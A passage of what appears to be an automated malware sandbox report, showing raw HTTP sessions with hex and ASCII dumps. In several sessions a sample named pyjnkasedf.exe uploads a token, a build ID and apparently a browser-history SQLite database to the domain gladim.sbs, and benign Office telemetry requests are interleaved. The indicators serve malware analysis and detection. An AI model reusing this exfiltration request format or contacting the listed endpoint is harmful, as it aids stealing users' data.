                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:40 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      88192.168.2.104982394.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 3165
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------CBGHCAKKFBGDHJJJKECFCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:41 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      89192.168.2.104982413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:41 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                      x-ms-request-id: 55122f27-801e-0083-61b2-42f0ae000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213841Z-174f7845968n2hr8hC1EWR9cag00000011r00000000032mt
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      90192.168.2.104982613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:41 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:42 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 432
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                      x-ms-request-id: 35239132-b01e-005c-225f-404c66000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213842Z-174f7845968qj8jrhC1EWRh41s0000001200000000004aws
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      91192.168.2.104982994.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 207993
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------JDBGDHIIDAEBFHJJDBFICont
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                      Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      92192.168.2.104982713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:42 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
